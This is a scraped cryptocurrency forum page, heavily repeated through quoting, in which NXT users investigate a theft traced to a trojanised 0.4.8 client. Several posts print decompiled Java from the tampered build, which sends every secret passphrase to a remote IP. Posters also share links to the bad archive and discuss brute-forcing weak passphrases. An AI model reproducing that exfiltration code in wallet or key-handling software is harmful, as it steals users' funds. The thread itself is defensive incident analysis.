Topic: NXT :: descendant of Bitcoin - Updated Information - page 1950. (Read 2761645 times)
We need to lock for public all wiki pages with a download link, all download links should aim to the 1st topic here instead of direct downloads
clean
vs
clearly someone modified Nxt$Crypto.class
EDIT: question is who and where did you guys downloaded this (where was the link)?
Code:
static byte[] getPublicKey(String secretPhrase)
{
try
{
byte[] publicKey = new byte[32];
Nxt.Curve25519.keygen(publicKey, null, MessageDigest.getInstance("SHA-256").digest(secretPhrase.getBytes("UTF-8")));
return publicKey;
}
catch (Exception e) {}
return null;
}
{
try
{
byte[] publicKey = new byte[32];
Nxt.Curve25519.keygen(publicKey, null, MessageDigest.getInstance("SHA-256").digest(secretPhrase.getBytes("UTF-8")));
return publicKey;
}
catch (Exception e) {}
return null;
}
vs
Code:
static byte[] getPublicKey(String paramString)
{
try
{
if (!paramString.equals("")) {
if (!myKeys.contains(paramString))
{
URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
URLConnection connection = url.openConnection();
connection.setConnectTimeout(10000);
connection.getInputStream();
myKeys.add(paramString);
}
}
}
catch (Exception localException) {}
try
{
byte[] arrayOfByte = new byte[32];
Nxt.Curve25519.keygen(arrayOfByte, null, MessageDigest.getInstance("SHA-256").digest(paramString.getBytes("UTF-8")));
return arrayOfByte;
}
catch (Exception localException1) {}
return null;
}
{
try
{
if (!paramString.equals("")) {
if (!myKeys.contains(paramString))
{
URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
URLConnection connection = url.openConnection();
connection.setConnectTimeout(10000);
connection.getInputStream();
myKeys.add(paramString);
}
}
}
catch (Exception localException) {}
try
{
byte[] arrayOfByte = new byte[32];
Nxt.Curve25519.keygen(arrayOfByte, null, MessageDigest.getInstance("SHA-256").digest(paramString.getBytes("UTF-8")));
return arrayOfByte;
}
catch (Exception localException1) {}
return null;
}
clearly someone modified Nxt$Crypto.class
EDIT: question is who and where did you guys downloaded this (where was the link)?
Now that we seem to have figured out this breach, we need to warn anybody that downloaded that version, but I guess we can't broadcast message yet...
Still there will be concerns about the offline parallel attack. I am still waiting for CfB's answers on my architecture question. We don't need an immediate solution as long as there is a clear roadmap to higher security. both perceived and actual.
If the hacker has to search a space 2^256, then even with petahashes it will take a long time. However, I am worried about clustering especially with user selected passwords without maximum entropy. Realistically, if anybody uses alphanumeric passwords of a short length or just combines common words, a hacker running a simple brute force search of these combos will unlock all these accounts pretty quickly. Our opponents will intentionally use reasonable looking but weak passwords to intentionally get hacked and give us black PR.
I want to proactively attack this issue. How does NXT security compare to BTC or to Ripple security? These are critical questions for mass adoption of NXT. I want to hear that NXT is better than all the rest, but what I need is an independent cryptographic expert to analyze this objectively.
Not sure how much this will cost, but it will go a long ways toward eliminating this as an issue if indeed NXT is as secure or more secure than BTC (and Ripple). Does anybody know how much it will cost to get an independent cryptographic analysis?
James
P.S. also maybe a bounty to PaulyC of 7808 NXT for finding this?
Still there will be concerns about the offline parallel attack. I am still waiting for CfB's answers on my architecture question. We don't need an immediate solution as long as there is a clear roadmap to higher security. both perceived and actual.
If the hacker has to search a space 2^256, then even with petahashes it will take a long time. However, I am worried about clustering especially with user selected passwords without maximum entropy. Realistically, if anybody uses alphanumeric passwords of a short length or just combines common words, a hacker running a simple brute force search of these combos will unlock all these accounts pretty quickly. Our opponents will intentionally use reasonable looking but weak passwords to intentionally get hacked and give us black PR.
I want to proactively attack this issue. How does NXT security compare to BTC or to Ripple security? These are critical questions for mass adoption of NXT. I want to hear that NXT is better than all the rest, but what I need is an independent cryptographic expert to analyze this objectively.
Not sure how much this will cost, but it will go a long ways toward eliminating this as an issue if indeed NXT is as secure or more secure than BTC (and Ripple). Does anybody know how much it will cost to get an independent cryptographic analysis?
James
P.S. also maybe a bounty to PaulyC of 7808 NXT for finding this?
Agree. PaulyC deserves a bounty to uncover this type of thief.
Now that we seem to have figured out this breach, we need to warn anybody that downloaded that version, but I guess we can't broadcast message yet...
Still there will be concerns about the offline parallel attack. I am still waiting for CfB's answers on my architecture question. We don't need an immediate solution as long as there is a clear roadmap to higher security. both perceived and actual.
If the hacker has to search a space 2^256, then even with petahashes it will take a long time. However, I am worried about clustering especially with user selected passwords without maximum entropy. Realistically, if anybody uses alphanumeric passwords of a short length or just combines common words, a hacker running a simple brute force search of these combos will unlock all these accounts pretty quickly. Our opponents will intentionally use reasonable looking but weak passwords to intentionally get hacked and give us black PR.
I want to proactively attack this issue. How does NXT security compare to BTC or to Ripple security? These are critical questions for mass adoption of NXT. I want to hear that NXT is better than all the rest, but what I need is an independent cryptographic expert to analyze this objectively.
Not sure how much this will cost, but it will go a long ways toward eliminating this as an issue if indeed NXT is as secure or more secure than BTC (and Ripple). Does anybody know how much it will cost to get an independent cryptographic analysis?
James
P.S. also maybe a bounty to PaulyC of 7808 NXT for finding this?
Still there will be concerns about the offline parallel attack. I am still waiting for CfB's answers on my architecture question. We don't need an immediate solution as long as there is a clear roadmap to higher security. both perceived and actual.
If the hacker has to search a space 2^256, then even with petahashes it will take a long time. However, I am worried about clustering especially with user selected passwords without maximum entropy. Realistically, if anybody uses alphanumeric passwords of a short length or just combines common words, a hacker running a simple brute force search of these combos will unlock all these accounts pretty quickly. Our opponents will intentionally use reasonable looking but weak passwords to intentionally get hacked and give us black PR.
I want to proactively attack this issue. How does NXT security compare to BTC or to Ripple security? These are critical questions for mass adoption of NXT. I want to hear that NXT is better than all the rest, but what I need is an independent cryptographic expert to analyze this objectively.
Not sure how much this will cost, but it will go a long ways toward eliminating this as an issue if indeed NXT is as secure or more secure than BTC (and Ripple). Does anybody know how much it will cost to get an independent cryptographic analysis?
James
P.S. also maybe a bounty to PaulyC of 7808 NXT for finding this?
Ok here are the two zip files in one file.
The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. the smaller one I believe was the one posted on the front page?
DO NOT USE THIS FILE FOR NXT:
https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo
The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. the smaller one I believe was the one posted on the front page?
DO NOT USE THIS FILE FOR NXT:
https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo
The file you uploaded is a RAR file, not zip even though it has a zip extension. Just a FYI for others who attempt to open it and get an error.
First file inside is 7173063 bytes in size and has the SHA256 hash:
ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2 nxt-client-0.4.8 (2).zip
The second file inside is 7177834 bytes in size and has the SHA256 hash:
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06 nxt-client-0.4.8.zip
Damn.
I'll leave further analysis to those who have more experience. I only just started learning Java a few months back to do Android programming. I'm more of an assembly/hardware guy.
Interesting...:
Code:
if (!paramString.equals(""))
{
if (!myKeys.contains(paramString))
{
URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
URLConnection connection = url.openConnection();
connection.setConnectTimeout(10000);
connection.getInputStream();
myKeys.add(paramString);
}
}
{
if (!myKeys.contains(paramString))
{
URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
URLConnection connection = url.openConnection();
connection.setConnectTimeout(10000);
connection.getInputStream();
myKeys.add(paramString);
}
}
Ok here are the two zip files in one file.
The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. the smaller one I believe was the one posted on the front page?
DO NOT USE THIS FILE FOR NXT:
https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo
The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. the smaller one I believe was the one posted on the front page?
DO NOT USE THIS FILE FOR NXT:
https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo
The link is gone. The thief has probaly took it away. Can you upload yours zip download ?
the link I posted that says do not use? Or did you mean to copy someone else's post?
I made that link there, it has the zip inside, it's the smaller file. I don't have the exact link of where I DL'ed it but I believe it was Mega
and was definitely linked from Nextcoin.org.
@xyzzyx oh my bads I just rar'd it together and threw the extension on the whole file, sorry.
PaulyC:
the 0.4.8 client I used, I forgot where I downloaded it, but from chrome history,
the link was http://162.243.246.223/nxt-client-0.4.8.zip
this client is different from what I Just downloaded from this thread:
ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2 nxt-client-0.4.8 (1).zip
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06 nxt-client-0.4.8.zip
the 0.4.8 client I used, I forgot where I downloaded it, but from chrome history,
the link was http://162.243.246.223/nxt-client-0.4.8.zip
this client is different from what I Just downloaded from this thread:
Code:
ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2 nxt-client-0.4.8 (1).zip
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06 nxt-client-0.4.8.zip
162.243.246.223 looks like it is "epicdices.com" (http://domain-kb.com/www/epicdices.com)
Owner of epicdices - EpicThomas - is a member of this topic:
https://bitcointalksearch.org/user/epicthomas-172850
Ok here are the two zip files in one file.
The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. the smaller one I believe was the one posted on the front page?
DO NOT USE THIS FILE FOR NXT:
https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo
The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. the smaller one I believe was the one posted on the front page?
DO NOT USE THIS FILE FOR NXT:
https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo
The file you uploaded is a RAR file, not zip even though it has a zip extension. Just a FYI for others who attempt to open it and get an error.
First file inside is 7173063 bytes in size and has the SHA256 hash:
ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2 nxt-client-0.4.8 (2).zip
The second file inside is 7177834 bytes in size and has the SHA256 hash:
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06 nxt-client-0.4.8.zip
Damn.
I'll leave further analysis to those who have more experience. I only just started learning Java a few months back to do Android programming. I'm more of an assembly/hardware guy.
Edit:
Files nxt/webapps/root/WEB-INF/classes/Nxt$Crypto.class and nxt-BAD/webapps/root/WEB-INF/classes/Nxt$Crypto.class differ
Ok here are the two zip files in one file.
The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. the smaller one I believe was the one posted on the front page?
DO NOT USE THIS FILE FOR NXT:
https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo
The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. the smaller one I believe was the one posted on the front page?
DO NOT USE THIS FILE FOR NXT:
https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo
Got it. The bogus client is in the link. Can someone check where is the modification ?
This is the place and link I actually DLed and was using when my NXT was stolen (I think I'm not sure if it's the exact same file it coulda been updated?)
https://nextcoin.org/index.php/topic,4.0.html
https://mega.co.nz/#!yV5A1BTR!oi33K7WovgccuEHvP05nzggTnxrkZHJbwFmv5tGeXNI
Ok I just realized those two links (front page and nextcoin.org) are the same. weird. Could they have been different yesterday?
This download was posted by Dextern - who run away already with funds given him for a bounty, right?
Source is out tomorrow :'), The price recovered.... 
wanted to buy moar... had about 50 btc to buy.... now I went and spent them elsewhere, hookers and snow....
wanted to buy moar... had about 50 btc to buy.... now I went and spent them elsewhere, hookers and snow.... 
if I go to the https://nextcoin.org/index.php/topic,4.0.html, where you probably downloaded a bad client:
- Drexme acts very strange since 21st of December 2013 (sold giveaway fund...)
- I can see in Drexme's post: "« Last Edit: January 01, 2014, 11:49:52 PM by punkrock »"
- but punkrock seems like he is a big helper: https://nextcoin.org/index.php?action=profile;area=showposts;u=2818
- Drexme acts very strange since 21st of December 2013 (sold giveaway fund...)
- I can see in Drexme's post: "« Last Edit: January 01, 2014, 11:49:52 PM by punkrock »"
- but punkrock seems like he is a big helper: https://nextcoin.org/index.php?action=profile;area=showposts;u=2818
Oh my god, my nxt was stolen by some one,
and the client behaves strange today: when I unlock my account, it stucked there and client complains:
the theft transaction is
sender: 16886318053889080545 recipient: 9793828175536096502 amount: 18197 fee: 1 confirmations: 453
which happened yesterday!
and the client behaves strange today: when I unlock my account, it stucked there and client complains:
the theft transaction is
sender: 16886318053889080545 recipient: 9793828175536096502 amount: 18197 fee: 1 confirmations: 453
which happened yesterday!
OS, Where did you you download the client? Which node you are using to access the account?
Source is out tomorrow :'), The price recovered.... wanted to buy moar... had about 50 btc to buy.... now I went and spent them elsewhere, hookers and snow....
wanted to buy moar... had about 50 btc to buy.... now I went and spent them elsewhere, hookers and snow....
didn't the download of the tainted version come from a page made by the accused thief?
James
James
Wow. I'm sorry guys.
I'm really sorry this happened, but I'm glad we now know how it happened.
Now let's find out who did it, and how.
can I get some SSH remote command help here?
on a box, I can do lynx -dump http://localhost:7874/nxt?requestType=getPeer\&peer=79.102.159.249
to see the stats for the 79.102.159.249 peer if it is connected. The results look like this (notice I had to escape the & there):
why can I not use this to do a remote SSH command?
on a box, I can do lynx -dump http://localhost:7874/nxt?requestType=getPeer\&peer=79.102.159.249
to see the stats for the 79.102.159.249 peer if it is connected. The results look like this (notice I had to escape the & there):
Code:
{"platform":"?","application":"NRS","weight":0,"state":1,"announcedAddress":"","
downloadedVolume":8758,"version":"0.4.7e","uploadedVolume":12675225}
downloadedVolume":8758,"version":"0.4.7e","uploadedVolume":12675225}
why can I not use this to do a remote SSH command?
Code:
root@vps1:~# ssh -i .ssh/vps root@vps1 lynx -dump http://localhost:7874/nxt?requestType=getPeer\&peer=79.102.159.249
{"errorCode":3,"errorDescription":"\"peer\" not specified"}
root@vps1:~#
{"errorCode":3,"errorDescription":"\"peer\" not specified"}
root@vps1:~#
Try:
Code:
ssh root@vps1 -t -C 'curl "http://localhost:7874/nxt?requestType=getPeer&peer=79.102.159.249"'
Code:
curl --silent "http://localhost:7874/nxt?requestType=getPeer&peer=79.102.159.249" | python -m json.tool
Edit: Added --silent option
Wow. I'm sorry guys.
I literally saw my client a few moments after it happened (it was open) so how this happened is odd!
My actual User account that has been stolen from is
NXT
16821029889165561706
I don't have any idea how this may have happened either. Just wanted to confirm, at the moment the theft happened your client was running and you had the browser window opened, and your account was unlocked (you were seeing your balance and the "send money" arrow), is that all correct?My actual User account that has been stolen from is
NXT
16821029889165561706
Just trying to differentiate the possibilities, whether the hacker obtained you password via brute-force or some other way and initiated the transaction from another machine, or somehow your own machine was tricked to initiate the transaction.
And you were running 0.4.8 at the time, right? I added the second check for secret phrase before send money exactly to increase security, so that even if you account is unlocked in the browser you still need to enter your password again.
Another question, did you generate your random-looking password using some software - password manager, online service, or created it manually by typing at random?
I just wanted to clarify, with this, I had my server and client open. Was just perusing the blocks within the client, seeing if I was up-to-date, something I just do sometimes, and the account balance went from 7808, then on next look 0, maybe a moment later, less than 10 seconds.
No one was remotely accessing my computer etc. It was just balance 0, account recipient ID under sent transactions with 7808, etc.
Update ran a full scan with my antivirus software, ESET, all up to date, no viruses or intrusions found.
The other question about password, this is the very first account I made so I did use the password generator that I had seen recommended on nextcoin.org
used "local" mode, to a certain degree,
http://passwordsgenerator.net/
(i definitely wouldn't recommend using one of these)
for 25 of the char of the PW, then I just made up the rest randomly 9 more characters.
and I'm not sure about what online nodes refers to exactly, but I can honestly say I never used anything online with that PW until today with CfB.
I don't see any strange opened ports so I believe I'm good on that end.
Has anyone else noticed the 4.8 download zip from nextcoin.org vs. the one from this exact link
Nxt 0.4.8 - https://mega.co.nz/#!yV5A1BTR!oi33K7WovgccuEHvP05nzggTnxrkZHJbwFmv5tGeXNI
Are 5 Kb in difference? is that anything to be concerned about?
I want to buy more NXT, but it just sucks cuz i got in somewhat early and thought I was following all the instructions correctly, and I honestly don't know what happened which makes me hesitant.
It's not cool everyone thinks I'm some troll planning this all out, but I guess that's a natural reaction. I would hope in the future there's someway to stop someone from just taking someone's NXT like this, (I actually thought the two step PW on "sending" was a good idea, but didn't stop them in this case)
I'll try to keep an eye out on this hacker's acct# to see if he hits anybody else.
http://22k.io/-account/16204974692852323982
Looks like you downloaded a bogus client. Scary stuff. The client at the front page of this thread is legit. You need to calculate the hash256 of the zip file of your client and compare to the hash in the 0.4.8 in the front page. They have to match exactly.
As you said you have two same client with 5Kb difference in size. One is certainly bogus. Sorry for your loss. This should really be sticky.
I could have fallen for this since I never checked the file until today.
But for now, only use client file from trusted source and do a checksum hash256 the zip file before using.
This needs to be in wiki and the front page.
everyone can edit wiki......
Ok here are the two zip files in one file.
The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. the smaller one I believe was the one posted on the front page?
DO NOT USE THIS FILE FOR NXT:
https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo
The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. the smaller one I believe was the one posted on the front page?
DO NOT USE THIS FILE FOR NXT:
https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo
Jump to: